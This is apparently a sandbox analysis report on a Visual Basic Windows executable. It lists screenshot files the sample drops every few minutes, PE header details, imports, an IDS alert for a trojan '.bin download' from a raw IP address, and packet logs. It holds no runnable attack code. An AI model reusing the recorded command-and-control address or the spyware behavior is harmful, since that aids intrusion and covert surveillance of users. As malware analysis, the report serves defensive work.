                                                                                                                                                                    SHA-256:15B33684A8EA5F62E043F57A0849472A887207B0C453EBFE8601D9ED80FD42F9
                                                                                                                                                                    SHA-512:634A5F562B431D30EE4A8D8548F525291F909F3040ACD848085968D6DA2538E69F003862B26F915771AA0047F92D92CB52C87A8852D5582BCCD97777F88740FD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.*....BSz...T.LfW...[.(.F..].bfE...Q..*...WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.|k...x.w%./`-....mDg.|....?........G....m.@}2V...H......PP...6.}l.*l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i|.^.A.$...7~.... ....1......T.l`*...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_043815.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805831
                                                                                                                                                                    Entropy (8bit):7.955185028460513
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:3qkmM120hq6axPwYs5p5lr4xSEe3HEdGfDz:3qlw2KdoPwYs5pzM0E4HAeDz
                                                                                                                                                                    MD5:8D4183371EC26ADA7FEF095B424999F6
                                                                                                                                                                    SHA1:3F6FAC40C6480D2F0FB12335DE06DF20742FE6F9
                                                                                                                                                                    SHA-256:36C92B78CD698F0A54BCBE3E84B524D91ACCDECFF32D01BB1143C4D3755DAE58
                                                                                                                                                                    SHA-512:3D8F5618DA668E26EFAB9536D6F81BB60A9BDF8C7EA36F6E185453A5D9D0E516F527329EDCDA20D4918C0E2670335A017C19A5E2434F67D7AFDD61A6D8F8C6BD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.*....BSz...T.LfW...[.(.F..].bfE...Q..*...WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.|k...x.w%./`-....mDg.|....?........G....m.@}2V...H......PP...6.}l.*l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i|.^.A.$...7~.... ....1......T.l`*...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_044815.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805723
                                                                                                                                                                    Entropy (8bit):7.954324107532815
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:nAG53EhiIc4ezePK+t5Xi9ZLTtTNSuSyIqFOCylKpm2ajfWTB8du3/:3qkIctSJnkpT4iFO7l0Fd
                                                                                                                                                                    MD5:C919959C585542D1FECA86D4FF05456E
                                                                                                                                                                    SHA1:BCE69D21F6CEEEA1A67E4A3140C7E3F648423E00
                                                                                                                                                                    SHA-256:8B5FEC93876C5A2C7CF26E52BEF0D225E79E42C57F81C0D668C07B8C4B46FB66
                                                                                                                                                                    SHA-512:AB4731DF323CC4CF620F6EA9499B8D700AFBECBE962A6C08B2BA5B157C4DFD818D94E3677CC01DD33A0CD1593FA31418F71B8547186A41F2389DACEB4D3B1DE5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...tE..}...x..".%.d..p.Q.Q.P.u...7.8(......"..,9........{.Y..AT$HV2.W.v..Uk.k....y.>..{..r.U.S.{ff.g....]...ff..8fW.G....Y.."f.=..U7.X..3.{..bM...5..c.."&..t).Mc....~6....j.......s....+..X1.J.t.X..<Y..C.(.mb.*....BSz...T.LfW...[.(.F..].bfE...Q..*...WzJ......J.3..+>.1.....G.VsB..txT..".x.P...m.....j.).eV~.c.':...L'.].$nm...aT.^..."...)(.a..6.%..{dv...,3.......9ko8V......hv.-...D..`..Yk..@.....j(P........ib.m.Y......4..h...%.[1.K.].b0W..;.9.|k...x.w%./`-....mDg.|....?........G....m.@}2V...H......PP...6.}l.*l..t.,.....R....Pm.I.U..-X.VF~9t..50m.j{..E...a..`..90Lx..d+..:.&.M..vD.....?..@...OuF..P..L..T..>.T.R....i|.^.A.$...7~.... ....1......T.l`*...h.Xj.zO.-.J..3......1H.kc*..FX_.Z..ZS.. ....J.$../....\.#....d.L..8..5...4.........v..Q%:..me.CG;[....'PX..;............H.#.$......)..........B....j..7.-...V.~.....0..^..$.@F......(...g.^#.j..G.:. ' .G......rR..
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_045816.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805709
                                                                                                                                                                    Entropy (8bit):7.953835421134929
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:WhJ4iVkp4pkR6l/qf49+9vl6U/cQJcb7jFZA+QaK9eSbUIg9nCIBC5epXbKjj12F:WvJkOW6srl7ciSlZue7BREsmpY
                                                                                                                                                                    MD5:D1AA5C9473FE36D89ACC65401B3EE4B5
                                                                                                                                                                    SHA1:14B71284235DB7FF8D9B4AC518197EE54DAB5BEF
                                                                                                                                                                    SHA-256:A1771D0DA033DF5498722E31157AD0A15124FF9F5E5427457736ABAAB047C7CE
                                                                                                                                                                    SHA-512:DE3899888728A399ACCCA7149446083E216A254671B5698D45C8579832F39FACEACF16679B9BA870DAA818771942B8E8C6C7ABB3CE3E38738C23558864263548
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...lE..}..Q..(......b`.D.....3..t.A.PD.D..A$...fT.y.O0gE..1.. J.@}.j.^..[{W....}...tw.\..S.{ff.'...T..fff.';f.z..i.../....^.Z[V,~f...u..X..Y...u....(].c..u.lG...<#0......v!.zj.5.b.\..m{........j...#E.1.2.&.r.P..4....Au.dv..z....kT...+fV..H|....r..{......k<..N<.1....3.|....(.jNh.....7Rd...J...m:.c!A-?...Ov...D...........>...+x.Xd..e.e?.7.F.D{z....6.ef.M......c....j..f.....yN..z...n...-..Y..m.......(@..'...%...1PKS..6@.Y....u+.s%a....&....qW....,..Ft.....P.#...Y..}....xs....GB...4...@....c.Va....g.6....b..l.j;O...n..2......i[P..(,.........O.a.{0&[.8.!5.h*..#.... ..,...-~.3...R.eJ..r0.1....T.L......&.......T....6..m.1........`.S.p,@..R..{bh.P.>.....T..A._.S..7....,..Ft.....P.#...Y..}....-.'ce............l.&...v...*...,l+#..:.......=.."P..0.....P.@>.D..Q_.%.f..O...E.6w.4.."l.HP.l..hY...r.#t.p..A...` ).2*}..Lh@.H'?....V..?...9.a>.T..(.F...:.U..]
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_050816.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):796706
                                                                                                                                                                    Entropy (8bit):7.957036024835413
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:tVeBGQw+UQjjkuiX84b2Qt7VJYrExxykzC:HQdU6jkuiX84b2QXJYIEkm
                                                                                                                                                                    MD5:5DC583708DCF9270E71A6374C9A03EB9
                                                                                                                                                                    SHA1:CEB14081E201F986D4D79BEACFD1D9D506A3A06F
                                                                                                                                                                    SHA-256:BA0192407BD06570B90E5FD23F5DDED63F1C5CFB01820C6843486078CB2A75B9
                                                                                                                                                                    SHA-512:13A9C3AFEBF3A36F531BEE62AF40E86BCE43859792A90BB50994D49ABB25725DE6772CAB71E46B627AEBE6C9C6B966B57AA1E3C4D72935C68B1B2174C592D5FA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...%E..}...\.$i...f.Q@E%GA.......(...9...a.C....P.....U.0...T.rRf....Vu..V...w.}....<.g.]..+.zOu....o7C.....fh.......B..{w.........6........+.L.....Y~.....<6.Y~.rD.a.{=C...a.m.b.wf.....el..X:.e.u./.|.-%..C.Q.[.8*....CQz..)....^.B=e..@.5*..2.CKS]$i...ZU%..(..M..X..fd.b]....8..Z..P~.o2&4.O.G..)..w.J...mj.}!.L~...e7p...D...TA.3.7.J...+h..uc.]w....0.@......2<.......:6.Ff......:.=.g.-.6....&m.@v.*.5..|.'...3_..W2.1..>...../{.O.....u.C..<...q]....J.......:p.....v..D.>m.9..L...I_.o.......it... hs{..[.......e...?yt...Pm.I.U..Y.VF~U.igk`.......@q{CG..:..0....d)5.:$#...`9"|.@...........F..P..L..Tv.&:T.R.k..|.....I.d........ ....1$...._+.....}..(....]....!.z.......u...M........C.....y.2..y?}"...~.a...e,.....?.~O.._%..i..9< ...5.+...v@mM..%..?d...e|.C..'mT..7fa[..U.....i[P..(,.........cE...M ...I_.,FE.n..)..4.....b.B....j..'.-...+'?B_....S;R..+.2*}..L.C.H'.....V..?...9.a>.
                                                                                                                                                                    C:\Users\user\AppData\Roaming\Screenshots\time_20220102_051818.png
                                                                                                                                                                    Process:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):805744
                                                                                                                                                                    Entropy (8bit):7.9544298824383235
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:n4TW8TVQ8XgQoKqq+kDCKthsZFayV/UMqppeojdg:h8TFX4QBD/tmZ0pMOpjjdg
                                                                                                                                                                    MD5:2EA774300B5E25393BCE4D31ADB106B8
                                                                                                                                                                    SHA1:245E1C52737500E44A72720EED8FDDB28FAD3243
                                                                                                                                                                    SHA-256:014229C2139A2EDB4E546495FA398FAF337DBD84D62A3E71E555B2B9E857A549
                                                                                                                                                                    SHA-512:1D9DB0BDD5BA7B7619837ECFA152BC011E7C6DB26B54BDB6467BA5539F6790BD072268B0BA719F82262EC6FB7CC7233893CC862C42A6803B4981723725270CFA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...lE..}..QG%(............`..q....8(.....""..`..J0...&...b"(A....].z..o.].{w.>..y....s.zO..U.dfV}r.j.....]..72..D..zF.klQ..Y.3kz..bm.g7..sb..*&..t)..c....~6.....g.Xd.X.iuV..ms..../VI......T.3....P?.t.X..!@a.......1..U3.).....Q.gW..Y..".e........vw..$3.*.D..*Op.<z.1B.Q...h?...o..>...v.d.t..B.Z~........E!..A.3.[[%j}...W...K..~.o..b.....]dm.......bs3g...[:.=....{.M..fK..Av.?4.G..H...C.>...m..y.I..f.i.....=..K....f#.n..._.Xg.r.l;..@-M9>..}d...u!.kW..J.~.3..oMT.......EY..4.....<...G......}..5<b.f..'ce....X...i.... js.....?@..m.!.'.....v..Q%:..me.CG;[....'PX..;..........`L..q.Cj..T.lG....@.#X....[.Tgt......L.`.c@.!.........M. ........8..m:Q..cj.).).M......X.6..........}...ef.y...l]"..Yf...?.............V.Q.v.T.\.@._.S..7....l..Ft.....P.#...Y..}....-.'ce............l.&...v...*...,l+#..:.......=.."P..0.....P.@>.D..Q_.%.f..O...E.6w.4.."l.HP.l..h

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Entropy (8bit):5.878526280109068
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                                                                                                                    • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                    File name:g4FtSOZMD9.exe
                                                                                                                                                                    File size:258048
                                                                                                                                                                    MD5:81f377eda4163da1b74cae83e38ced9f
                                                                                                                                                                    SHA1:e50abaf01a9fd3ae8176b5b6117f6b8f8a355ec0
                                                                                                                                                                    SHA256:a16d035ca37dbd7ab34c856f4cdf96a9898dcebba08c5801c99f3d3100ae6b3f
                                                                                                                                                                    SHA512:8fd4613830195a00650386e450e72081546603de6fdff40ca039464cb5d33fd0d2aed0151c6f40558671d631c132f99a5400d9a2db304aac05729b941c40a63d
                                                                                                                                                                    SSDEEP:3072:ShYPey2QV00E3KxPpW9J+PZK7kzqHD2+KM5KOKVhYPey2QV00E:ShYGy2a00yiw0ZK7RjbnQhYGy2a00
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L....6.Y..........................................@................

                                                                                                                                                                    File Icon

                                                                                                                                                                    Icon Hash:00030313371f3800

                                                                                                                                                                    Static PE Info

                                                                                                                                                                    General

                                                                                                                                                                    Entrypoint:0x401604
                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                    DLL Characteristics:
                                                                                                                                                                    Time Stamp:0x599A3698 [Mon Aug 21 01:25:44 2017 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                    File Version Major:4
                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                    Import Hash:86e8943063c6c8ab68d4fd8da1862bd7

                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                    Instruction
                                                                                                                                                                    push 0040F390h
                                                                                                                                                                    call 00007F0A406DC843h
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    xor byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    inc eax
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [ebp+0297E4EAh], dl
                                                                                                                                                                    out dx, al
                                                                                                                                                                    sub ecx, dword ptr [edi-58h]
                                                                                                                                                                    inc byte ptr [375B32A1h]
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add dword ptr [eax], eax
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    inc ecx
                                                                                                                                                                    outsb
                                                                                                                                                                    popad
                                                                                                                                                                    insd
                                                                                                                                                                    outsb
                                                                                                                                                                    imul esp, dword ptr [ecx+33h], 00000000h
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                    dec esp
                                                                                                                                                                    xor dword ptr [eax], eax
                                                                                                                                                                    add dh, bh
                                                                                                                                                                    std
                                                                                                                                                                    adc esp, dword ptr [edx]

                                                                                                                                                                    Data Directories

                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2d9940x28.text
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x310000xe1a0.rsrc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x1f0.text
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                    Sections

                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    .text0x10000x2d0440x2e000False0.457790208899data5.78348802097IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .data0x2f0000x12500x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .rsrc0x310000xe1a00xf000False0.640185546875data6.27760526833IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                    Resources

                                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                                    RT_ICON0x3e7e10x9bfPNG image data, 256 x 256, 4-bit colormap, non-interlaced
                                                                                                                                                                    RT_ICON0x3d45f0x1382PNG image data, 256 x 256, 8-bit colormap, non-interlaced
                                                                                                                                                                    RT_ICON0x3783e0x5c21PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    RT_ICON0x377160x128GLS_BINARY_LSB_FIRST
                                                                                                                                                                    RT_ICON0x3742e0x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 0
                                                                                                                                                                    RT_ICON0x36dc60x668data
                                                                                                                                                                    RT_ICON0x3685e0x568GLS_BINARY_LSB_FIRST
                                                                                                                                                                    RT_ICON0x35fb60x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                                                                                                                                                    RT_ICON0x3510e0xea8data
                                                                                                                                                                    RT_ICON0x34ca60x468GLS_BINARY_LSB_FIRST
                                                                                                                                                                    RT_ICON0x33bfe0x10a8data
                                                                                                                                                                    RT_ICON0x316560x25a8data
                                                                                                                                                                    RT_GROUP_ICON0x315a80xaedata
                                                                                                                                                                    RT_VERSION0x313000x2a8dataEnglishUnited States

                                                                                                                                                                    Imports

                                                                                                                                                                    DLLImport
                                                                                                                                                                    MSVBVM60.DLL__vbaVarSub, _CIcos, _adj_fptan, __vbaHresultCheck, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, __vbaVarIdiv, __vbaPut3, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR4, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaAryConstruct2, __vbaI2I4, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaUI1I4, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaVarCat, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, __vbaVarLateMemCallLd, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                                                                                                                                                    Version Infos

                                                                                                                                                                    DescriptionData
                                                                                                                                                                    Translation0x0409 0x04b0
                                                                                                                                                                    LegalCopyrightCfar
                                                                                                                                                                    InternalNameIndregnet8
                                                                                                                                                                    FileVersion1.00
                                                                                                                                                                    CompanyNameCfar
                                                                                                                                                                    LegalTrademarksCfar
                                                                                                                                                                    ProductNameCfar
                                                                                                                                                                    ProductVersion1.00
                                                                                                                                                                    FileDescriptionCfar
                                                                                                                                                                    OriginalFilenameIndregnet8.exe

                                                                                                                                                                    Possible Origin

                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                    EnglishUnited States

                                                                                                                                                                    Network Behavior

                                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                    01/02/22-02:28:02.373487TCP2018752ET TROJAN Generic .bin download from Dotted Quad4983580192.168.2.6147.189.137.168

                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                    TCP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Jan 2, 2022 02:28:02.274339914 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.372740030 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.372864962 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.373486996 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.499038935 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.499066114 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.499083042 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.499106884 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.499120951 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.499125004 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.499165058 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.499185085 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.597301960 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.597328901 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.597342968 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.597382069 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.597408056 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.599652052 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.599713087 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.599730968 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.599747896 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.599747896 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.599770069 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.599783897 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.599791050 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.599808931 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.599812031 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.599822998 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.599836111 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.599864960 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.695604086 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.695719957 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.695727110 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.695780993 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.695806980 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.695847034 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.695907116 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.695914030 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.695964098 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.696228981 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.698076963 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.698133945 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.698183060 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.698201895 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.698206902 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.698254108 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.698259115 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.698302984 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.698304892 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.698353052 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.698358059 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.698401928 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.698402882 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.698451996 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.698455095 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.698529005 CET4983580192.168.2.6147.189.137.168
